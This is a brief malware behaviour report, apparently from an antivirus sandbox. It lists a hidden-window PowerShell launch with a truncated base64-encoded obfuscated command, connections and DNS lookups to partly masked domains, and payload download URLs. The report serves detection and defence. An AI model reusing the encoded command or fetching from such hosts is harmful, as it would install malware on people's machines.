Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\819067.cvr
- 'co##ub.de':80
- 'eg###tair.co.nz':80
- 'eg###tair.co.nz':443
- 'fa#####aarcobaleno.ch':80
- 'fa#####aarcobaleno.ch':443
- 'es####malibe.com.br':80
- http://co##ub.de/cgi-bin/qgi3ncv70163850/
- http://eg###tair.co.nz/css/file/yUULClon/
- http://fa#####aarcobaleno.ch/wp-snapshots/PNXFHEqzTK/
- 'eg###tair.co.nz':443
- 'fa#####aarcobaleno.ch':443
- DNS ASK co##ub.de
- DNS ASK ar#####oposlovanje.com
- DNS ASK dr###-estate.ch
- DNS ASK eg###tair.co.nz
- DNS ASK fa#####aarcobaleno.ch
- DNS ASK es####malibe.com.br
- DNS ASK fa##e.fr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAGUAaABuAHYANQBsAD0AKAAoACcAWQAnACsAJwBnAG4AJwApACsAJwB2AHAAJwArACcAaQBvACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBzAEUAUgBwAFIAbwBmAGkAbABFAFwARQBpADEAcwBKAD...' (with hidden window)